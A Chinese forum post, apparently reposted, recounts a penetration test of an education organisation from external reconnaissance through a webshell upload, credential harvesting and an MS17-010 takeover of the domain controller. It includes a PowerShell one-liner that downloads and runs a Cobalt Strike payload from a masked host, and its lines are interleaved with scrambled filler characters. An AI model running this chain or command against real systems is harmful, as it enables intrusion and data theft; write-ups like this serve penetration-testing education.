|
5 X' \+ U% \, ? G* R1 n
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
1 |% z$ L$ F1 V% B
, V" ]# n7 I2 k1 @; G- h4 ~- r* d8 M' V. a6 q7 A& W
* o5 S E5 D- H. F1 v, S
) E- s2 h3 W* m
4 H: n0 Y4 X- A) s( C 正文
3 E5 q8 m. w2 t- r7 r
9 \6 o8 M* f$ z& [8 g- E2 l3 a) v+ Q. s1 f
6 v# I2 p0 |( N: T& D* v
+ D( U: `8 a# q- j7 y2 R( k
+ q2 |/ F5 n, }1 s 目标:www.xxxx.com(一家教育机构)
' y% X! |5 J& H3 M/ l8 J7 m& Q) M打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
& R% |1 h$ n6 G/ [# j6 Z
6 R4 u6 d! R( j" q% m" Y1 z3 y* ^0 y) F6 b* @
) x) P1 f! N7 ]2 d5 }! E
# J3 ?% l+ a' l8 A
! u/ M9 [( L& \1 P8 t 进行了简单的信息搜集
}7 ~1 D- y1 \5 Q) o. i
( p! u7 T" J( O
1 w3 p) P3 G; f" r, q1 b6 v
7 \# z1 f7 P, ~& d' L
$ |, A2 q$ G! F, k+ c: H
子域名搜集 ]/ s Y. c& V) X6 e, Z8 m% \
4 s$ H8 H8 m5 E9 o' C: _. u7 L$ c5 g* W# ^7 q
 1 B n9 G; ~9 H' [2 u$ n- e
# w: U9 Y$ _7 Y0 t. d* y0 u* A. ?& u9 |% U) g" u8 S
fofa找资产
# f# J& v# U1 d. M+ S3 p8 p, D. j
8 q" V, l! E/ p+ p6 \
6 `* _' `: L$ W/ q1 @" S $ F/ n! x/ v3 R* P! C# P" m- o
2 l/ w1 i- s6 y9 l% T/ X
 ; y9 [8 t3 O* f2 h
. @9 {* {) F8 R2 t2 a$ Q" }) B7 U, f
一共七个资产。去重之后只有两个。
5 N( D/ D3 O( [0 I$ O# F
! _! N1 L0 Y9 b4 n' W& G
0 L2 R& \& l1 Z K1 k& E/ _& F* R
5 B1 k% B1 } n9 h9 }/ v2 I, I- i G% ]6 ~( Z. o# K! K& r/ A
目录探测5 _. J1 g: e9 S o' E/ q
6 a2 X$ X. ^* w( O
, E- P _4 K0 d3 q# {
 : A1 |" D) _/ m- h) |: a/ N
/ B/ k9 Q# X7 R' \- Y% F; L( ^# b' P
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
0 l) {; |# _* \- O# a/ W0 g
' F/ l5 \5 M! m* B6 R
0 y/ b" N& v+ P5 q0 I5 q9 c 6 N! `/ E5 v( d# v/ X$ o" [
( k4 E1 v) \) j$ p S 我又尝试了通过修改返回包来绕过登录界面
: ^* C6 \' J% R' w! | / n z; l h/ K1 H# Y3 J9 s
, u8 f a9 v- |6 ?* N6 b 
3 t. E" Y D* E B8 K
8 Z! N6 r, e {. Y
9 S2 w1 ~8 Y; J4 ?! H, V+ m 还是不行,尝试注入无果
4 ]. j: |. D, h) |3 t/ G. l
# v9 V0 {* k. u$ ^
( t; `* c4 L3 p: H0 `  ( ?, z2 p% p/ U/ u
3 {8 N ]# c5 x) D6 U& k3 ^/ K* F. f1 y% n+ S
不过我目录探测出了一处Spring信息泄露
. ]9 p. B- | E8 r* P* ?
* F5 x1 v# p+ h, ^( x
9 [7 V0 H9 g& m
! C. }6 h r% I8 i) {
' f! h: U5 C! ^( D$ w. T. ?. l 
' N3 U# T9 ?7 g8 E- T3 _, @- x A
: e( N7 f: F) {; o' A+ Q% ~
4 J! w. y; Z L8 `& Q 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
9 D. {: R' H7 m6 I+ ]
$ j9 Q* C) v" }5 x
F. q' \6 }* O  4 U: `' I+ z2 L+ U) U$ y
8 ]& l2 Q% C' W( ~2 y/ @5 C9 y1 v% x2 P/ \3 x+ u6 b# z
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。/ _" X' F2 E* C, j' K
7 N) Z* t* f' O% a' p+ q# V* w% j0 ]" e
 / h( J2 e; a2 }) q# S
- s9 \8 D! n3 N3 S; ?
5 B' n& R: Z# r7 p4 _" A# l 获取有些师傅到这一步就手机抓包电脑测了。
8 G3 U+ c6 Z5 b
l$ ~/ N o3 L; O3 f {8 i+ U6 D
& o7 ?& x' }. M9 x! g Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
. @( q; C! G b0 f! V0 H
. z* l' d' K; c1 i
Y0 Q+ E9 v- ~3 y7 X7 K. x 其中在一个公众号发现了小程序,可以进行注册。
0 M* g. N0 M! H# k 0 J( z( ~! @3 I, ^3 P% N7 ?
7 _. d, ^# {4 j, g 看到了头像上传,尝试上传获取WebShell; a8 N" T# ~; ]9 U% c& E
9 x5 }* n! M# r/ J* t
; g( f; X" G8 U2 u# {$ j: L8 {
 9 Z7 w& D% J) l2 P. U1 D, f9 T
1 f0 c" w5 b- M2 c/ D6 }. {
: f% v9 T2 d& ?1 V7 F2 l; s5 f i
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
% m9 x+ R0 q, i$ g, T) O
% i1 y; a6 V1 p9 l9 N9 D( v3 f# J
5 M, r2 [( @4 G( T" V" L# d; G& B. P 
, S" @6 D1 ^0 a ( E/ E, w' n( ^$ K3 y
1 k& }% {8 ?5 B7 F! n' E 然后上了大马0 A7 e( e, L9 V; m6 B. x, e
~% h7 J! S* v
; K( O7 S* o5 G' v r5 r: Z
 & x0 D- V q# u7 v! i* w @: Q3 T; F
7 r: Z+ ~# b( p" Z# J* s* `; z( D7 x
) S) y- q! x# D! l- R  ; M) r% i( w' Y6 P5 g' K, b* [
. w" _/ ^0 m, v3 w: e
3 H% ~( [1 G K' s2 Y: O& Z, B9 b 通过翻找文件发现数据库账号密码2 |# P/ v0 R: q2 L8 r+ U
5 B* K; Q5 I* C$ A" v J$ b
4 l) p6 G8 H( _( h" r( p' m6 H  9 T W* g/ `% T3 u. E
7 D2 ~6 o# v! n( G+ O0 H
4 [8 E( M8 B* s7 m+ }
--内网渗透
/ z3 V$ B: l% A2 U7 P
+ Q! r* X) h2 c1 ~; s" M
0 H, S, R; }+ N! z2 v3 N 直接通过powershell执行 cs上线
7 [% \5 F6 j5 C7 q% g+ d$ m . V, R" ?5 Z S" X' P# \- X2 |7 A
# G) k0 C9 G9 R. y) j# x+ _5 A powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"4 ~' M/ L [2 j& P
) @. L& T) _* f
0 Y# V5 c. B; [: i( O# R/ J6 G  + b* h( g r( R" u% m. J6 M
5 D/ i3 k2 [; Q" v. l' z
7 R/ h Z4 p8 R' ~, k- Z: b- U
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破. V' [% u8 H9 @" k
* Z- u) S) F; B% g( f, E
A' F, z+ ~0 d3 @7 ~( z5 l, T
 b) ~1 q- R3 `! g# j6 ~6 @# i0 h
J w- @5 j: }9 e
% k) G4 P, O, E/ Y3 b* n# N 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! Y; o7 R) O9 m4 K
4 j7 F: u: }3 J& B/ [
8 ^- Q' W) H( J, b* Q/ L: J& @' V
( S! _+ s( ~5 X# O4 s
6 s4 ^0 Y: h+ S4 W' q ^5 _' j, @6 R$ N# Y
 2 s1 L9 H6 ~' R% G
# p$ ^: g( ~" n
: f* R( f7 L- q9 |1 D. b7 }3 \ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! V% h0 H' l1 ]7 x7 r& J; g
d* l3 }0 f4 J$ q! }5 C! w1 t
' u3 K: b9 _4 c0 B5 q1 ]' |
- _1 h3 v7 v3 A3 E/ B6 d
( N7 _# |( O9 K! i, m; s2 f
 ! w2 [. f4 ~6 ?# S1 U/ B
5 x! f I; Y) K. r1 u1 L$ o8 z' d0 U0 L; P) Y, [/ E' ~, n1 g
% Q5 }% ?4 L( P; ~' S# v
# g: F9 [& N9 v$ @0 N
: L# d& {& K/ ]: Q N3 y1 }2 m & ^3 s! |& I+ A
$ V3 u' B2 S& @% Z
/ R, U- d4 Y) o9 d j" a8 P0 p
+ g$ o& k/ b- q+ o- s
2 q/ H4 b5 k' l8 [8 \! a 小结
- \$ ?2 N9 O- S6 r; v, { ' ~7 @5 e- A* b! I# s
- q3 b9 S! D2 L" O+ S" N1 I# A
, z( z! X; N& Z0 V) d. B. q
( h- k) V+ _0 f1 s7 n
7 C- u. K7 s9 ^" J: N# r: P2 N) C 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
) t( I5 X4 |' n
4 ^; W/ S! v- y+ l' u! n1 o1 a0 v% R W/ B8 K. c
3 g; i! d7 E1 f% c4 U - |% o- Q7 ~3 ^
9 i9 a9 s0 }& L7 N! }
- * T7 z4 H* @# s3 v
* e; l. ]5 N. V( R9 k
7 g) [5 o4 Q8 H/ E -
$ _) S1 l. W0 i6 @% ], s2 p
: [# Q& K3 u; S: H# c+ \3 b
* T* G1 Z k p7 ~& R% U) F6 F # @/ B* ^5 l7 [& _# A8 p i4 k
& Z3 ] S% j# o4 Y) N& m
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html2 o* C$ K0 W8 F5 g# K
( B5 i% I: ]' @& q3 U* [4 F
+ f' `+ E% \3 x; u 8 r, H# y5 o$ M8 A5 I1 ?4 X% q
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对